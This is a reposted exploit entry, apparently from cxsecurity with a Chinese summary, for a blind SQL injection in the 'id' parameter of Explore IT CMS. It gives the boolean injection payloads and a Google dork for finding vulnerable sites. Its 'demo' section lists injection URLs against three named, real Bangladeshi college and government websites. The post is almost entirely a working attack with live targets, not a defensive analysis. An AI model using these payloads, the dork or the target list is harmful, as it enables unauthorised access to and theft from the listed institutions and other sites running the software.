Explore IT CMS存在盲SQL注入漏洞。攻击者可利用id参数在URL中附加特定语句(如' and 1=1--+)触发漏洞。通过对比正常和异常响应可确认漏洞存在。该漏洞已被验证影响多个网站,并可通过Google Dork 'Technical Assistance by: explore IT'查找潜在目标。 2025-5-9 18:27:47 Author: cxsecurity.com(查看原文) 阅读量:10 收藏
********************************************************* # Exploit Title: Explore IT CMS - Blind SQL Injection Vulnerability # Date: 2025-05-09 # Exploit Author: AmirHossein Abdollahi | Mr_Amir_Typer # Google Dork: "Technical Assistance by: explore IT" # Category: WebApps # Tested On: Windows 11 + Firefox / Burp Suite ********************************************************* [+]: Vulnerable Parameter: `id` in URLs with `.php?id=` Append `' and 1=1--+` and `' and 1=2--+` to the URL and observe the difference in responses. ********************************************************* ### Demo 1: https://kachalonggovtcollege.edu.bd/page.php?id=2 → https://kachalonggovtcollege.edu.bd/page.php?id=2'+AND+1=1--+ → https://kachalonggovtcollege.edu.bd/page.php?id=2'+AND+1=2--+ ### Demo 2: https://www.rangamaticollege.gov.bd/page.php?id=13 → https://www.rangamaticollege.gov.bd/page.php?id=13'+AND+1=1--+ → https://www.rangamaticollege.gov.bd/page.php?id=13'+AND+1=2--+ ### Demo 3: https://www.cgsacollege.edu.bd/page.php?id=3 → https://www.cgsacollege.edu.bd/page.php?id=3'+AND+1=1--+ → https://www.cgsacollege.edu.bd/page.php?id=3'+AND+1=2--+ ********************************************************* [+] Google Dork: "Technical Assistance by: explore IT" ********************************************************* # Discovered by: AmirHossein Abdollahi | Mr_Amir_Typer
如有侵权请联系:admin#unsafe.sh